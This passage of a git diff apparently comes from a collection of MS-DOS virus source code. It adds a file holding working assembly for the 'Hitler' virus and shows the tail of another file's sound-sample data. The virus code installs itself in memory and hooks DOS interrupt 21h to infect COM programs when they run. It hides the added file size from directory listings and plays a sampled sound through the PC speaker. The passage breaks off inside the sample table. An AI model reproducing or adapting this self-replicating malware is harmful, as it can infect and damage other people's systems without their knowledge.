08Fh,07Dh,07Ch,084h,07Eh,07Bh,086h,088h,07Eh,08Fh,089h,075h,08Ah + db 07Dh,079h,07Dh,080h,079h,07Fh,086h,077h,078h,07Dh,06Eh,08Dh,07Fh + db 074h,076h,07Eh,078h,078h,08Dh,079h,07Eh,082h,07Eh,080h,087h,079h + db 076h,082h,074h,07Eh,081h,06Eh,074h,081h,082h,081h,092h,07Bh,07Fh + db 08Fh,08Ah,08Bh,07Ch,070h,074h,08Fh,07Eh,084h,084h,06Fh,075h,07Ah + db 08Eh,07Bh,07Ch,078h,078h,083h,086h,08Eh,07Eh,082h,070h,07Dh,08Dh + db 078h,07Bh,06Fh,077h,076h,087h,085h,074h,079h,077h,07Dh,085h,084h + db 06Bh,07Eh,07Eh,077h,086h,088h,079h,07Dh,091h,07Bh,081h,09Bh,073h + db 080h,07Bh,07Bh,090h,084h,070h,07Bh,08Ah,078h,07Fh,081h,071h,07Fh + db 082h,080h,074h,081h,07Bh,06Dh,07Fh,070h,078h,089h,07Ch,077h,089h + db 08Ah,07Fh,086h,07Eh,072h,081h,073h,068h,07Fh,082h,073h,085h,08Ah + db 086h,09Eh,093h,07Bh,081h,086h,069h,07Dh,086h,06Ch,07Fh,088h,088h + db 08Fh,09Ch,08Ch,079h,086h,074h,067h,06Dh,064h,069h,077h,07Fh,084h + db 09Fh,085h,08Dh,09Bh,074h,071h,06Ch,05Dh,062h,07Dh,06Dh,073h,086h + db 090h,091h,097h,092h,07Ah,079h,07Ch,061h,06Dh,076h,073h,070h,088h + db 090h,094h,09Bh,09Bh,094h,078h,077h,078h,060h,05Dh,069h,07Bh,087h + db 090h,09Fh,09Dh,09Fh,0A1h,080h,076h,068h,053h,04Bh,066h,072h,072h + db 086h,099h,097h,0A2h,0ADh,082h,06Ah,064h,05Ah,053h,061h,06Ah,067h + db 08Ah,0ABh,0ADh,0ACh,09Bh,0A5h,060h,067h,066h,059h,056h,06Fh,093h + db 08Fh,0BFh,0A8h,08Eh,0AFh,0AAh,044h,04Fh,070h,041h,057h,08Dh,084h + db 07Dh,0D1h,094h,07Eh,0BEh,088h,02Dh,06Ah,070h,038h,07Bh,0ABh,063h + db 0AFh,0A0h,068h,075h,0CDh,064h,013h,087h,068h,02Fh,0ABh,0B4h,037h + db 097h,0E0h,050h,097h,0F8h,022h,063h,0D4h,02Ah,07Dh,0E6h,038h,02Fh + db 0F9h,080h,047h,0E7h,0DAh,010h,07Fh,084h,034h,0B7h,0B0h,01Dh,035h + db 0D7h,0C0h,04Fh,0A1h,0B2h,002h,06Fh,0DEh,014h,087h,040h,001h,077h + db 0FFh,0A0h,032h,0BDh,0E2h,05Bh,0D7h,0C0h,000h,095h,02Ah,000h,0A7h + db 0C8h,02Ch,057h,0AEh,0C4h,09Fh,0E2h,030h,03Bh,0DCh,04Ah,02Fh,0FCh + db 084h,03Ah,0A5h,0D3h,094h,0BBh,0D8h,020h,07Fh,0A0h,018h,033h,0FFh + db 06Ch,009h,0A7h,0E2h,03Ah,0AFh,08Ah,000h,087h,068h,020h,09Fh,0D0h + db 040h,05Bh,0FFh,088h,03Fh,0D5h,01Ch,027h,0A0h,036h,04Fh,0FFh,0A8h + db 042h,0EFh,0D0h,05Eh,0F3h,0A0h,000h,05Bh,045h,03Dh,0F5h,0B4h,01Eh + db 057h,0FFh,060h,087h,0DCh,000h,007h,084h,04Ch,07Dh,0FFh,071h,02Dh + db 0FFh,0C4h,037h,0CFh,064h,000h,06Fh,038h,03Dh,0FFh,0C0h,034h,09Bh + db 0FFh,054h,0A3h,0C2h,000h,05Fh,050h,01Ah,09Fh,0FFh,050h,03Fh,0FFh + db 08Ch,073h,0F7h,034h,000h,07Ah,048h,073h,0FFh,080h,029h,0EFh,0D8h + db 02Eh,0ABh,068h,000h,08Dh,036h,028h,0F3h,0D8h,044h,08Fh,0FFh,04Ah + db 0AFh,0DAh,000h,02Bh,030h,03Fh,0D3h,0E8h,05Ah,07Fh,0FFh,068h,097h + db 0E2h,000h,00Bh,021h,03Fh,0A7h,0FFh,06Ch,063h,0FFh,078h,073h,0DFh + db 050h,000h,000h,04Dh,09Fh,0FFh,082h,033h,0E7h,0C0h,059h,0AFh,098h + db 000h,02Bh,03Fh,062h,0F1h,0A6h,073h,0DFh,0FFh,040h,08Bh,0D0h,000h + db 000h,017h,05Fh,0FDh,0FFh,058h,08Fh,0FFh,06Dh,0B7h,0ECh,008h,000h + db 027h,07Bh,0C6h,0D2h,075h,097h,0FFh,060h,076h,0C8h,018h,000h,000h + db 065h,0AFh,0FFh,096h,073h,0FFh,088h,07Fh,0DAh,040h,000h,000h,07Bh + db 09Fh,0E0h,082h,069h,0FFh,0D4h,05Fh,066h,080h,000h,027h,049h,062h + db 09Dh,0AAh,099h,0FFh,0F8h,038h,096h,0D4h,000h,000h,027h,077h,0FFh + db 0FCh,068h,09Fh,0FFh,065h,0AFh,0D8h,000h,000h,02Fh,09Ah,07Fh,088h + db 06Dh,0CFh,0FFh,062h,06Dh,0B1h,028h,000h,019h,065h,0BFh,0F4h,062h + db 08Bh,0FFh,084h,077h,0EBh,054h,000h,000h,05Dh,0AFh,0FFh,08Ah,057h + db 0FFh,068h,069h,0ABh,084h,000h,000h,065h,099h,0FFh,09Ch,05Bh,0EFh + db 0E4h,09Dh,093h,09Ah,000h,000h,07Fh,093h,08Eh,089h,06Ch,0E5h,0FFh + db 05Dh,074h,0CFh,038h,000h,023h,079h,09Bh,0DEh,091h,0AFh,0FFh,05Ch + db 073h,0A7h,084h,000h,000h,046h,09Fh,0FFh,080h,053h,0DFh,0E4h,077h + db 08Ah,0B8h,000h,000h,06Bh,089h,0A4h,084h,085h,0BFh,0FFh,050h,02Bh + db 0C7h,068h,000h,00Fh,055h,0B5h,0FFh,0D0h,014h,0CFh,084h,059h,0DDh + db 0C0h,000h,000h,08Fh,0B6h,0CBh,09Ah,050h,0D7h,0FFh,026h,055h,0A2h + db 008h,000h,03Bh,06Ch,08Ah,0D3h,094h,083h,0FFh,082h,091h,0E7h,060h + db 000h,00Ch,095h,082h,09Ch,0B3h,07Ah,0E7h,0FEh,028h,059h,0D7h,058h + db 000h,001h,03Fh,0BFh,0FFh,078h,063h,0FFh,086h,0B3h,0FFh,040h,000h + db 000h,06Dh,08Fh,0D9h,0A1h,060h,0B3h,0D2h,0C7h,074h,048h,000h,045h + db 04Bh,03Bh,097h,0B8h,0A2h,0D3h,0FFh,064h,071h,0CEh,004h,00Bh,01Bh + db 052h,07Bh,0C1h,0F6h,0A4h,0C5h,0C0h,065h,072h,0C6h,000h,000h,00Ah + db 03Fh,0DFh,0FFh,058h,06Bh,0FAh,044h,0A7h,0FFh,028h,000h,03Bh,0BDh + db 0FAh,0FFh,088h,07Bh,0FFh,058h,062h,057h,060h,000h,000h,043h,08Bh + db 0FFh,098h,06Ah,0E7h,0D0h,062h,08Ah,0B0h,000h,005h,05Fh,0B5h,0B2h + db 0A4h,072h,0D7h,0FFh,038h,087h,088h,01Ch,027h,053h,06Ah,09Dh,0FFh + db 070h,075h,0FDh,048h,063h,0C5h,080h,000h,015h,06Bh,0B7h,0FFh,084h + db 048h,0A7h,0E0h,061h,0B3h,088h,000h,031h,03Eh,062h,09Bh,0ECh,058h + db 05Bh,0FFh,054h,06Bh,0B5h,0A0h,000h,000h,061h,091h,0FFh,090h,043h + db 0EFh,0B8h,09Ah,09Fh,0A8h,000h,027h,031h,05Bh,09Ch,0BAh,0B0h,0BFh + db 0F5h,04Ah,07Fh,0E5h,042h,000h,000h,056h,0BBh,0FFh,090h,03Fh,0FFh + db 090h,0BFh,0D7h,094h,000h,000h,05Fh,08Eh,0FFh,080h,04Eh,0A5h,0D8h + db 07Fh,064h,094h,000h,000h,03Bh,088h,074h,068h,0BFh,0FBh,0FFh,04Ah + db 05Fh,0A5h,092h,015h,000h,01Fh,07Bh,0FFh,0FFh,052h,0DFh,050h,09Fh + db 0D3h,0C0h,000h,000h,053h,08Dh,0FFh,098h,036h,087h,0D4h,08Bh,06Dh + db 0B4h,000h,000h,035h,07Dh,0CBh,0F8h,0BAh,074h,0FFh,078h,075h,09Ah + db 050h,000h,000h,0AEh,082h,073h,0A6h,0B0h,0FFh,0C8h,03Bh,052h,099h + db 032h,000h,023h,044h,07Fh,0FFh,0FFh,058h,087h,046h,07Bh,0F3h,0CAh + db 000h,000h,05Fh,0CAh,0FFh,0FEh,024h,077h,0B8h,039h,076h,0B4h,00Eh + db 000h,02Bh,08Eh,0ABh,0FFh,070h,063h,0FFh,080h,09Ch,0BBh,054h,000h + db 00Fh,06Ah,0A5h,0D6h,09Ah,099h,0DDh,0D4h,056h,067h,094h,000h,000h + db 01Dh,066h,0BBh,0FFh,070h,067h,0D0h,06Fh,096h,0DEh,048h,000h,036h + db 06Fh,09Ah,0FFh,070h,027h,0C9h,056h,06Ch,08Fh,084h,000h,023h,057h + db 086h,0FFh,0F4h,080h,04Fh,0F5h,06Eh,082h,0C9h,020h,000h,003h,05Bh + db 099h,0FFh,0C0h,03Ch,0EBh,080h,08Fh,09Dh,0A8h,006h,00Eh,056h,077h + db 0DFh,0FFh,060h,07Fh,0B0h,06Eh,062h,0CEh,01Ah,017h,047h,05Dh,085h + db 0FFh,0FFh,040h,097h,05Ah,05Eh,06Fh,0B4h,000h,037h,050h,07Fh,0ABh + db 0FFh,0D8h,000h,0A7h,040h,047h,07Fh,08Ch,01Ch,023h,06Dh,080h,0C7h + db 0FFh,080h,019h,0D2h,030h,056h,09Fh,070h,018h,02Dh,086h,0A8h,0FFh + db 0FFh,070h,08Fh,0A0h,03Ch,018h,09Fh,070h,00Ah,053h,095h,099h,0FFh + db 0FFh,044h,08Bh,088h,02Dh,00Fh,0ADh,044h,006h,067h,0A2h,085h,0EBh + db 0FFh,030h,04Fh,094h,013h,000h,0BBh,035h,037h,083h,08Ch,093h,0FFh + db 0FFh,040h,06Dh,0A8h,023h,027h,0AFh,034h,047h,072h,092h,07Fh,0EBh + db 0FFh,054h,04Bh,0C0h,039h,044h,09Dh,054h,055h,075h,0C6h,084h,096h + db 0FFh,0A0h,033h,0BFh,04Ch,02Ch,056h,08Ah,055h,087h,0B3h,062h,051h + db 0C7h,0DCh,02Eh,08Fh,094h,020h,02Ah,07Dh,06Eh,0BDh,0ACh,06Ch,04Ch + db 0A3h,0FFh,080h,03Eh,0B3h,030h,02Ah,04Dh,08Eh,04Dh,095h,0A3h,06Ch + db 057h,0AFh,0FFh,060h,05Bh,0D5h,032h,04Fh,06Fh,064h,05Eh,0CDh,0A0h + db 03Ah,06Fh,0CDh,0C0h,04Ah,082h,0DBh,02Ch,06Dh,04Bh,04Eh,087h,0B8h + db 06Bh,058h,07Fh,09Eh,0CCh,072h,073h,0D5h,030h,06Fh,067h,048h,05Bh + db 0BAh,09Ch,058h,07Dh,099h,0D4h,094h,06Ch,0C3h,04Ch,079h,03Eh,025h + db 06Bh,0D4h,078h,072h,07Bh,07Ah,0BBh,0C1h,04Ah,08Bh,088h,02Bh,058h + db 034h,046h,0DDh,09Ah,080h,072h,06Ch,08Fh,0FFh,070h,013h,0B1h,030h + db 086h,055h,05Fh,0C7h,0B4h,082h,075h,087h,08Dh,0FFh,078h,000h,0A7h + db 058h,07Bh,070h,03Ah,05Bh,0BCh,08Eh,0A8h,0ACh,034h,08Fh,0D8h,028h + db 05Bh,0E0h,028h,07Fh,059h,029h,0ABh,0CCh,064h,06Bh,080h,049h,0AFh + db 0D0h,023h,07Fh,0B0h,00Eh,089h,061h,02Fh,0B7h,0B2h,070h,092h,088h + db 06Fh,0EFh,090h,023h,09Bh,0B4h,035h,08Ch,03Dh,03Fh,0D3h,094h,08Bh + db 0C7h,060h,03Bh,0B9h,082h,069h,0CFh,0A0h,027h,084h,02Ah,04Bh,0EFh + db 08Ch,07Eh,08Ch,050h,05Fh,0E3h,079h,04Fh,0AFh,078h,01Bh,081h,02Ch + db 03Dh,0D3h,078h,077h,0B3h,066h,055h,0BFh,082h,069h,0B2h,0A8h,025h + db 08Ah,035h,043h,0D3h,09Ch,07Bh,09Bh,05Ah,03Dh,0AFh,0C6h,07Fh,077h + db 07Fh,062h,06Ah,096h,05Dh,073h,0AAh,06Ah,08Ch,08Ah,054h,04Fh,08Eh + db 0AAh,07Bh,06Fh,09Ch,070h,05Dh,084h,056h,07Fh,0C5h,085h,073h,060h + db 05Ah,071h,0C3h,0A8h,050h,056h,064h,071h,087h,0ACh,04Bh,071h,088h + db 074h,0A4h,08Bh,085h,069h,072h,0A9h,090h,067h,07Ch,0A8h,038h,07Fh + db 088h,05Bh,07Fh,0A5h,06Ah,073h,0B9h,05Bh,056h,0B2h,05Ah,042h,0A2h + db 0CCh,044h,037h,079h,055h,073h,0E2h,0A5h,06Bh,091h,062h,056h,0B7h + db 0ACh,051h,05Fh,0A1h,090h,02Eh,0A3h,07Eh,045h,09Fh,0A2h,07Ch,095h + db 08Ah,070h,067h,0AEh,074h,055h,0A7h,0DBh,018h,033h,066h,06Ch,07Bh + db 0C3h,090h,049h,07Dh,093h,076h,0B3h,0B0h,041h,046h,0A3h,08Dh,02Ah + db 08Fh,075h,046h,087h,0B2h,07Bh,07Eh,091h,06Eh,071h,09Fh,08Ah,069h + db 070h,092h,08Ah,04Fh,096h,090h,056h,07Dh,090h,084h,07Dh,0A1h,086h + db 066h,084h,08Bh,073h,081h,080h,084h,072h,089h,082h,06Bh,06Eh,07Fh + db 080h,077h,079h,095h,091h,059h,059h,081h,070h,069h,08Bh,08Eh,088h + db 059h,07Ch,06Dh,097h,083h,06Eh,07Fh,087h,093h,087h,078h,05Ch,078h + db 098h,07Eh,077h,08Fh,097h,062h,067h,080h,066h,07Eh,0A1h,07Ah,07Dh + db 089h,095h,078h,055h,073h,092h,08Ch,077h,07Dh,096h,092h,04Ah,05Fh + db 06Eh,087h,092h,08Ch,082h,085h,092h,078h,058h,06Ch,092h,073h,073h + db 086h,08Eh,07Fh,05Eh,04Ah,06Ch,073h,092h,0A0h,07Eh,090h,097h,08Bh + db 073h,070h,078h,089h,089h,075h,079h,08Fh,08Eh,07Ah,040h,05Fh,07Ch + db 086h,085h,0A2h,0A9h,084h,07Fh,075h,05Ch,073h,09Ch,076h,061h,07Fh + db 079h,075h,092h,082h,031h,069h,086h,076h,09Fh,0B1h,07Eh,073h,092h + db 06Bh,067h,097h,087h,074h,078h,07Ah,085h,099h,065h,067h,088h,054h + db 069h,085h,084h,087h,0A3h,08Ch,078h,09Fh,086h,053h,067h,07Ch,068h + db 075h,092h,078h,072h,07Ch,062h,07Dh,0AFh,090h,06Bh,07Ch,06Eh,068h + db 08Fh,0A0h,078h,06Ah,072h,075h,08Dh,08Ch,07Eh,089h,072h,054h,072h + db 08Bh,089h,07Fh,072h,06Bh,08Ah,0A2h,089h,08Fh,085h,066h,071h,093h + db 088h,074h,078h,06Dh,070h,08Ah,088h,089h,08Dh,072h,06Bh,080h,078h + db 079h,070h,069h,06Ch,07Ch,08Bh,082h,08Bh,078h,06Ah,087h,081h,07Eh + db 08Eh,070h,05Fh,079h,085h,07Fh,087h,07Ah,05Fh,08Ah,0A4h,076h,079h + db 080h,06Ah,069h,075h,07Eh,093h,0A5h,081h,072h,088h,088h,085h,090h + db 078h,060h,071h,07Bh,07Fh,084h,07Ah,068h,07Ah,08Ch,07Fh,07Ah,070h + db 068h,076h,07Ch,077h,093h,0A2h,080h,086h,07Dh,07Bh,083h,08Eh,068h + db 064h,074h,06Eh,077h,097h,074h,068h,080h,080h,071h,08Bh,07Ch,059h + db 079h,08Ah,074h,099h,09Ch,066h,07Fh,0A6h,07Fh,08Fh,0A0h,056h,06Dh + db 0A2h,06Ch,07Dh,09Dh,060h,05Fh,098h,072h,063h,097h,088h,048h,07Dh + db 085h,069h,0A3h,088h,04Eh,063h,09Fh,091h,077h,08Ch,074h,042h,085h + db 09Ch,06Ch,095h,066h,051h,08Fh,0CFh,07Ah,073h,09Ah,080h,065h,097h + db 080h,05Ah,081h,04Ch,04Ah,09Eh,09Ch,074h,07Fh,083h,086h,097h,09Ah + db 069h,07Fh,08Ch,060h,06Fh,0A0h,077h,06Eh,08Ch,08Eh,07Dh,083h,083h + db 064h,07Ah,074h,05Eh,079h,09Fh,07Ah,063h,083h,092h,069h,091h,088h + db 052h,075h,070h,069h,08Fh,0A0h,06Bh,074h,0ABh,08Eh,062h,08Dh,066h + db 063h,08Ah,071h,07Bh,0BBh,098h,068h,087h,0A4h,077h,097h,08Ch,044h + db 056h,069h,071h,0A7h,094h,05Dh,05Eh,0A4h,07Ch,077h,08Eh,05Ch,04Dh + db 07Eh,074h,07Bh,0ACh,078h,059h,0A3h,0A4h,060h,082h,084h,049h,075h + db 081h,07Eh,0ADh,0A5h,071h,07Fh,0BAh,074h,071h,084h,04Ah,05Bh,073h + db 071h,087h,0ADh,07Ch,062h,0ADh,093h,073h,097h,06Ah,03Fh,070h,077h + db 07Bh,0B5h,088h,058h,08Bh,0A8h,061h,079h,080h,045h,06Eh,075h,071h + db 09Bh,0B2h,072h,06Bh,0B0h,080h,078h,096h,061h,042h,05Fh,073h,08Dh + db 0B4h,088h,068h,0A3h,096h,06Fh,08Dh,07Ch,04Ah,05Eh,06Ch,07Fh,0BBh + db 0A0h,070h,08Fh,0B0h,07Eh,07Fh,08Ah,040h,030h,063h,086h,0AFh,0ACh + db 066h,063h,0B3h,080h,07Ch,07Eh,04Ch,03Fh,059h,079h,096h,09Bh,084h + db 077h,0ADh,090h,071h,085h,080h,03Eh,041h,073h,093h,0D3h,0B2h,076h + db 091h,09Ah,083h,0A3h,090h,040h,038h,05Bh,08Ah,0A7h,088h,071h,086h + db 090h,06Bh,07Eh,083h,052h,043h,057h,08Bh,0BBh,0C0h,080h,07Fh,0AAh + db 068h,07Bh,094h,050h,030h,048h,076h,09Dh,0A6h,07Dh,072h,0A7h,07Ah + db 069h,07Ah,07Dh,054h,065h,06Ch,085h,0A9h,0AAh,095h,0B2h,09Ch,059h + db 089h,0A1h,04Ch,049h,060h,07Eh,0C3h,0C0h,080h,083h,0A9h,067h,07Bh + db 08Dh,060h,03Ch,05Ah,085h,081h,07Eh,079h,08Dh,0B3h,060h,05Bh,07Bh + db 064h,03Dh,053h,06Ch,093h,0B5h,090h,08Ah,0BBh,07Ah,06Fh,08Fh,076h + db 046h,05Fh,070h,087h,0B3h,08Ch,07Ch,0AEh,078h,059h,085h,07Eh,048h + db 050h,07Bh,09Dh,0C1h,0A1h,08Fh,09Fh,098h,073h,085h,07Ch,048h,055h + db 07Ah,083h,083h,08Bh,08Bh,0A0h,0A8h,068h,06Fh,087h,05Eh,04Ah,061h + db 083h,095h,0A1h,090h,08Fh,0A8h,068h,067h,07Fh,062h,03Ah,056h,06Eh + db 097h,0B3h,087h,076h,09Fh,096h,06Ah,083h,080h,043h,056h,07Eh,088h + db 087h,08Fh,090h,0ADh,0B4h,060h,066h,08Dh,06Dh,044h,05Ch,075h,096h + db 0CAh,08Ch,063h,098h,071h,079h,087h,078h,044h,04Bh,083h,097h,09Bh + db 08Ah,07Ch,09Eh,0ACh,061h,05Fh,07Fh,062h,04Ah,067h,08Ah,095h,0BBh + db 098h,08Ch,0BDh,084h,085h,091h,06Ch,045h,059h,085h,08Bh,095h,08Bh + db 083h,0A4h,08Ch,04Dh,06Ah,08Bh,060h,048h,05Eh,07Fh,0ADh,0CCh,07Ch + db 068h,09Ch,064h,083h,089h,054h,036h,04Fh,07Dh,096h,0AFh,088h,072h + db 086h,0A0h,08Bh,074h,05Bh,04Dh,073h,078h,087h,09Eh,09Dh,092h,0A5h + db 0BCh,076h,07Bh,085h,059h,055h,06Ch,081h,093h,0A7h,0A1h,07Bh,07Ch + db 084h,06Dh,07Ch,07Bh,042h,039h,057h,07Dh,0C5h,0ACh,05Ah,071h,092h + db 06Ah,08Ah,09Fh,061h,046h,06Eh,099h,0BBh,0ABh,076h,073h,0A4h,068h + db 069h,06Fh,061h,036h,04Dh,07Bh,09Fh,0D1h,0A2h,081h,0B2h,098h,07Eh + db 093h,086h,04Bh,04Dh,077h,08Dh,0A7h,092h,07Ah,09Dh,0A0h,057h,072h + db 07Ah,05Ch,063h,065h,06Fh,09Fh,0CDh,08Dh,074h,09Ch,060h,063h,089h + db 070h,035h,046h,070h,095h,0C6h,090h,061h,085h,094h,06Ah,07Fh,07Eh + db 04Ah,05Ch,066h,076h,0A5h,0BAh,090h,087h,0BAh,082h,07Eh,095h,086h + db 04Ch,054h,07Dh,09Eh,0C9h,0A0h,06Ch,093h,086h,065h,073h,078h,03Dh + db 058h,065h,06Fh,08Ah,0AAh,090h,094h,0A1h,055h,062h,08Bh,068h,03Eh + db 04Ch,06Ch,09Bh,0D8h,090h,06Eh,0ACh,086h,07Dh,092h,076h,044h,052h + db 073h,089h,0B9h,096h,06Eh,08Dh,0A2h,065h,06Dh,084h,04Ah,05Dh,079h + db 090h,085h,094h,0ADh,0BBh,0C4h,066h,062h,083h,08Eh,056h,054h,068h + db 07Bh,0BFh,0BCh,070h,082h,063h,06Eh,08Dh,085h,040h,04Ah,069h,085h + db 0BDh,090h,05Ch,075h,09Ah,073h,07Bh,088h,050h,053h,074h,087h,097h + db 0ADh,08Eh,085h,0B3h,080h,073h,07Bh,076h,048h,059h,098h,092h,088h + db 08Ch,099h,0B6h,0A8h,05Bh,064h,081h,05Ch,050h,058h,066h,085h,0BFh + db 0A6h,072h,082h,057h,077h,0A5h,07Ch,04Dh,062h,07Bh,092h,0CAh,088h + db 054h,095h,080h,069h,07Bh,080h,04Ch,059h,07Ah,092h,0B5h,0B0h,079h + db 08Dh,09Ah,07Fh,07Fh,084h,057h,056h,076h,091h,09Fh,0A2h,088h,08Ah + db 0A5h,06Ah,06Dh,075h,05Ch,049h,062h,079h,087h,0BEh,099h,066h,08Eh + db 076h,07Eh,08Bh,074h,04Dh,05Bh,077h,089h,0AFh,0A0h,061h,07Bh,082h + db 065h,077h,08Eh,068h,068h,073h,08Eh,0A6h,0CAh,08Dh,065h,087h,08Bh + db 084h,076h,07Ch,054h,063h,075h,08Ah,0ADh,0B5h,078h,077h,093h,06Fh + db 07Bh,086h,060h,05Dh,068h,07Ah,093h,0C5h,08Ch,055h,083h,069h,071h + db 076h,072h,056h,05Ch,06Bh,081h,0ADh,0C4h,080h,067h,07Ah,061h,077h + db 096h,07Ah,072h,06Dh,07Eh,095h,0C2h,0B8h,064h,06Fh,072h,069h,078h + db 09Ah,078h,06Eh,073h,087h,0A7h,0CEh,098h,050h,07Eh,073h,074h,07Dh + db 088h,062h,066h,07Fh,091h,09Fh,0C3h,080h,058h,07Eh,060h,065h,081h + db 078h,057h,05Fh,088h,08Ch,0A0h,0B5h,076h,057h,070h,058h,070h,094h + db 075h,05Ch,077h,09Ch,08Ah,0A3h,0B8h,068h,05Fh,08Ch,06Dh,06Ah,095h + db 07Bh,06Bh,085h,093h,08Ah,0AFh,0B0h,064h,05Fh,08Fh,063h,069h,08Fh + db 067h,063h,07Dh,08Ah,082h,0A9h,0A8h,05Eh,05Dh,08Ah,060h,06Ah,089h + db 074h,073h,07Fh,092h,07Ch,089h,0B3h,081h,05Fh,093h,072h,066h,07Ah + db 08Eh,07Eh,089h,094h,080h,07Eh,09Fh,098h,064h,088h, +slutt: ; DREAMER has a weird sense of humor + +size equ $-100h +pgf equ ($+16)/16 diff --git a/MSDOS/Virus.MSDOS.Unknown.hitler.asm b/MSDOS/Virus.MSDOS.Unknown.hitler.asm new file mode 100644 index 00000000..48ef0b85 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.hitler.asm @@ -0,0 +1,701 @@ + call rakett +old db ' !' +rakett: pop bp + push bp + add bp,-103h + + mov ax,42ABh + int 21h + jnc failed + + cli + mov ax,3521h + int 21h + mov w [bp+offset old21],bx + mov w [bp+offset old21+2],es + + mov al,1Ch + int 21h + cli + mov w [bp+offset old1C],bx + mov w [bp+offset old1C+2],es + mov w [bp+offset teller],16380 + sti + + call normalspeed + + mov si,ds + std + lodsb + cld + mov ds,si + + xor bx,bx + mov cx,pgf + cmp b [bx],'Z' + jne failed + mov ax,[bx+3] + sub ax,cx + jc failed + mov [bx+3],ax + sub [bx+12h],cx + mov es,[bx+12h] + + push cs + pop ds + + mov di,100h + mov si,bp + add si,di + mov cx,size + rep movsb + + push es + pop ds + mov ax,2521h + mov dx,offset ni21 + int 21h + mov al,1Ch + mov dx,offset ni1C + int 21h + +failed: push cs + push cs + pop ds + pop es + + pop si + mov di,100h + push di + movsw + movsw + movsb + + mov cx,0FFh + mov si,100h + ret + + +findFCB: popf + call int21 + pushf + or al,al + jnz backFCB + call stealth +backFCB: popf + iret + +stealth: push ax + push bx + push dx + push es + + mov ah,2Fh + call int21 + + cmp byte es:[bx],0FFh + jne normFCB + add bx,8 +normFCB: mov al,byte es:[bx+16h] + and al,31 + xor al,31 + jnz shitFCB + mov ax,word es:[bx+1Ch] + mov dx,word es:[bx+1Ch+2] + sub ax,size + sbb dx,0 + jc shitFCB + mov word es:[bx+1Ch],ax + mov word es:[bx+1Ch+2],dx +shitFCB: + pop es + pop dx + pop bx + pop ax + ret + +ni21: pushf + cmp ah,11h + je findFCB + cmp ah,12h + je findFCB + + cmp ax,42ABh + jne not_42AB + popf + clc + retf 2 +not_42AB: + cmp ax,4B00h + jne not_4B00 + +call install_24 + + push ax + push bx + push cx + push dx + push ds + push bp + + mov ax,4300h + call int21 + jc back1 + mov cs:old_attr,cx + + test cl,4 + jnz back1 + + mov ax,4301h + xor cx,cx + call int21 + jc back1 + + push dx + push ds + call infect + pop ds + pop dx + + mov ax,4301h +db 0B9h ;mov CX,... +old_attr dw 0 + call int21 + +back1: ;go here if the attrib-get fails + pop bp + pop ds + pop dx + pop cx + pop bx + pop ax + +call remove_24 + +not_4B00: +back: popf + db 0EAh +old21 dw 0,0 + +int21: pushf + call dword ptr cs:old21 + ret + +infect: mov ax,3D02h + call int21 + jnc okay_open +bad1: ret +okay_open: xchg bx,ax + mov ax,5700h + call int21 + push cx + mov bp,sp + push dx + + mov ah,3Fh + mov cx,5 + mov dx,offset old + push cs + pop ds + call int21 + jc close + cmp al,5 + jne close + + cmp word old[0],'MZ' + je close + cmp word old[0],'ZM' + je close + cmp old[0],0E9h + jne infect1 + cmp word old[3],'!' + jne infect1 + +close: pop dx + pop cx + mov ax,5701h + call int21 + mov ah,3Eh + call int21 + ret + +infect1: mov ax,4202h + xor cx,cx + xor dx,dx + call int21 + + or dx,dx + jnz close + cmp ax,59000 + jae close + + dec ax + dec ax + dec ax + + mov word ptr putjmp[1],ax + + mov ah,40h + mov cx,size + mov dx,100h + call int21 + jc close + cmp ax,size + jne close + + mov ax,4200h + xor cx,cx + xor dx,dx + call int21 + + mov ah,40h + mov cx,5 + mov dx,offset putjmp + call int21 + + or byte ss:[bp],31 + + jmp close + +putjmp db 0E9h + dw 0 + db '!' + +install_24: pushf + cli + push bx + push ds + xor bx,bx + mov ds,bx + push ds + lds bx,[24h*4] + mov cs:old24[0],bx + mov cs:old24[2],ds + pop ds + mov word [(24h*4)],offset ni24 + mov [(24h*4)+2],cs + pop ds + pop bx + sti + popf + ret + +remove_24: pushf + cli + push bx + push es + push ds + xor bx,bx + mov ds,bx + les bx,cs:old24[0] + + mov [(24h*4)],bx + mov [(24h*4)+2],es + + pop ds + pop es + pop bx + sti + popf + ret + +errflag db 0 + +db 'Hitler Virus by Dreamer/DY',0 + +ni24: mov al,3 + mov cs:errflag,1 + iret + +old24 dw 0,0 + +xofs dw offset sample +len equ 4131 +divisor equ 230 +teller dw 16380 + +ni1C: + cli + pushf + push ax + push ds + push si + + push cs + pop ds + + cmp teller,0 + je teller_ok + dec teller + jmp noreset +teller_ok: + mov al,34h + db 0E6h,43h ;out 43h,al + mov al,divisor + db 0E6h,40h ;out 40h,al + mov al,0 + db 0E6h,40h ;out 40h,al + + mov al,090h + db 0E6h,43h ;out 43h,al + mov si,xofs + lodsb + db 0E6h,42h ;out 42h,al + + db 0E4h,61h ;in al,61h + or al,3 + db 0E6h,61h ;out al,61h + + inc xofs + cmp xofs,len+offset sample + jb noreset + mov xofs,offset sample +noreset: + sti + pop si + pop ds + pop ax + popf + + db 0EAh +old1C dw 0,0 + +normalspeed: cli + push ax + mov al,34h + db 0E6h,43h + mov al,0 + db 0E6h,40h + db 0E6h,40h + pop ax + sti + ret + +sample: + + + + + db 080h,080h,080h,080h,080h,081h,080h,081h,081h,081h,081h,081h,083h + db 083h,083h,083h,083h,083h,083h,083h,083h,083h,081h,081h,081h,081h + db 080h,080h,080h,080h,080h,080h,080h,080h,080h,080h,065h,000h,000h + db 075h,08Ah,084h,083h,083h,089h,081h,081h,081h,07Ah,079h,07Ch,07Ah + db 07Bh,07Ch,07Fh,07Ah,078h,079h,07Fh,07Bh,07Fh,07Dh,07Bh,07Ah,07Fh + db 083h,08Ah,08Ch,088h,08Ah,085h,083h,089h,08Bh,080h,082h,07Fh,081h + db 07Fh,082h,081h,08Bh,07Ah,074h,07Ch,07Eh,080h,07Fh,07Fh,083h,07Fh + db 084h,082h,083h,080h,083h,081h,07Dh,07Eh,080h,083h,083h,07Dh,079h + db 07Fh,084h,080h,07Bh,07Dh,07Fh,07Fh,07Ch,07Ah,07Dh,083h,081h,07Fh + db 082h,080h,07Bh,07Fh,08Ah,08Bh,086h,085h,086h,083h,089h,089h,086h + db 084h,07Dh,07Ch,07Eh,085h,086h,085h,086h,083h,081h,088h,087h,080h + db 07Dh,081h,083h,081h,080h,07Ch,07Eh,076h,075h,07Bh,07Ah,075h,072h + db 075h,06Fh,074h,07Eh,080h,07Fh,07Fh,07Fh,083h,087h,085h,084h,08Ah + db 08Bh,086h,087h,08Ah,08Ah,08Ah,081h,081h,089h,084h,081h,07Ch,086h + db 